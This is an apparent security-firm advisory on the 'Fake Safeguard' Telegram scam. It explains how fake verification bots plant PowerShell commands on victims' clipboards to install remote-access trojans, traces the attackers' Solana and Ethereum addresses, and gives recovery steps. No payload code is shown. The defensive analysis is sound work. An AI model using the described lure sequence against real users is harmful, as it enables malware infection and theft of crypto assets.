Recently, we have received numerous requests for help from victims, all related to the “Fake Safeguard” scam on Telegram. As many users are unfamiliar with this type of attack, they often lack vigilance when encountering such scams, making both novice and experienced players susceptible to falling victim. This article will delve into the tactics of this scam and provide effective preventive advice to help users protect their assets from loss.
(Background: An American economics professor warns that Trump’s establishment of a Bitcoin reserve could become the largest pump-and-dump scam in history.)
(Additional context: The co-founder of Multicoin has been exposed for “colluding with SBF”? Whistleblower: The two were closely involved in multiple cryptocurrency scams.)
**Scam Analysis**
This type of scam can be categorized into two main types. One involves stealing Telegram accounts, where scammers trick users into entering their phone numbers, verification codes, or even Two-Step Verification passwords to gain access to their Telegram accounts. The other method involves implanting malware onto users’ computers, which has been increasingly common recently. This article will focus on the latter approach.
During certain high-profile token airdrop events, when users are experiencing FOMO, they may come across the following Channel interface on Telegram and inevitably click on “Tap to verify”:
Clicking on “Tap to verify” opens a fake Safeguard bot, which superficially displays a verification process. This verification window is very brief, creating a sense of urgency that compels users to continue operating.
Upon further clicking, it will “falsely” indicate that verification has failed, ultimately leading to a manual verification prompt appearing:
The scammers have thoughtfully provided Step 1, Step 2, and Step 3. At this point, the user’s clipboard has already been compromised with malicious code, and as long as the user does not follow these steps, there should be no problem:
However, if the user obediently follows these steps, their computer will become infected with a virus.
Another example involves attackers impersonating KOLs and using malicious bots to guide users into executing Powershell malicious code. Scammers create fake KOL accounts on X, then attach Telegram links in the comments section, inviting users to join an “exclusive” Telegram group for investment information. For instance, a scam account appeared in the comments section of @BTW0205, where many users encountered “exciting messages”:
They would then enter the corresponding Telegram Channel, which guides users to verify.
When users click to verify, a fake Safeguard appears, similar to the aforementioned process, with Step 1, Step 2, and Step 3 guiding the verification operation.
At this point, the user’s clipboard has secretly been embedded with malicious code. If the user actually follows the instructions to open the execution box and pastes the malicious code content into it using Ctrl + V, the state will appear as shown in the following image, with much of the content hidden and a large blank space at the front containing the Telegram logo and malicious code.
These malicious codes are usually Powershell commands, which, when executed, silently download more complex malware, ultimately causing the computer to be infected with a remote control trojan (such as Remcos). Once the computer is under trojan control, hackers can remotely steal sensitive information from the computer, including wallet files, recovery phrases, private keys, passwords, and more, even leading to asset theft. (PS: For more on the behavior of the “Fake Safeguard” trojan, refer to the analysis by Slow Mist white hat Jose: https://jose.wang/2025/01/17/%E4%BC%AASafeguard%E7%97%85%E6%AF%92%E5%88%86%E6%9E%90/)
The Ethereum Foundation’s account @ethereumfndn has also been contaminated by this scam, demonstrating the widespread netting and harvesting approach of such scams.
Recently, even Trump’s X comment section has been affected by this scam:
If you are accessing it from your mobile device, the scam will gradually obtain your Telegram permissions. If detected in time, it is crucial to quickly go to Telegram settings, navigate to Privacy and Security -> Active sessions -> Terminate all other sessions, and then add or modify the Two-Step Verification.
If you are using a Mac instead of a Windows computer, similar methods exist to lure you into infecting your computer. The tactics are akin; when the following image appears in Telegram, your clipboard has already been covertly embedded with malicious code content.
At this point, there may be no immediate risk, but if you follow the provided steps, you will face the consequences shown in the following image:
**MistTrack Analysis**
We selected several hacker addresses and analyzed them using the on-chain tracking and anti-money laundering platform MistTrack.
Solana hacker addresses:
HVJGvGZpREPQZBTScZMBMmVzwiaVNN2MfSWLgeP6CrzV
2v1DUcjyNBerUcYcmjrDZNpxfFuQ2Nj28kZ9mea3T36W
D8TnJAXML7gEzUdGhY5T7aNfQQXxfr8k5huC6s11ea5R
According to MistTrack’s analysis, these three hacker addresses have collectively profited over $1.2 million, including SOL and multiple SPL Tokens.
Hackers initially convert most SPL Tokens into SOL:
Then, they disperse the SOL into multiple addresses, and the hacker addresses interact with platforms such as Binance, Huobi, and FixedFloat:
Additionally, the address HVJGvGZpREPQZBTScZMBMmVzwiaVNN2MfSWLgeP6CrzV still has a balance of 1,169.73 SOL and over $10,000 worth of Tokens.
We also analyzed one of the Ethereum hacker addresses 0x21b681c98ebc32a9c6696003fc4050f63bc8b2c6, which had its first transaction in January 2025, involving multiple chains and currently has a balance of about $130,000.
This address transferred ETH to several platforms such as ChangeNOW, eXch, and Cryptomus.com:
**How to Prevent**
If your computer has been compromised, you need to take immediate action:
1. Transfer any wallets or funds used on this computer promptly; do not assume that a wallet with a password in an extension is safe;
2. Change passwords or 2FA for all accounts stored in various browsers or previously logged in;
3. Change all other accounts on the computer, such as Telegram, wherever possible.
Make the most extreme assumptions; since your computer has been infected, it is transparent to the scammers. Therefore, think in reverse: if you were a scammer completely controlling a computer actively participating in the Web3/Crypto world, what would you do? Finally, after backing up important data, you can reinstall the system, but it is advisable to install internationally recognized antivirus software such as AVG, Bitdefender, or Kaspersky to ensure comprehensive protection. After handling these issues, you should be in a good position.
**Conclusion**
The Fake Safeguard scam has evolved into a mature hacking attack model, with a covert and efficient full process from impersonating comments to implanting trojan viruses, and ultimately stealing assets. As attack methods become increasingly sophisticated, users must remain vigilant against various misleading links and operational steps online. By enhancing awareness, strengthening protection, and promptly identifying and addressing potential threats, it is possible to effectively guard against the harm of such scams.
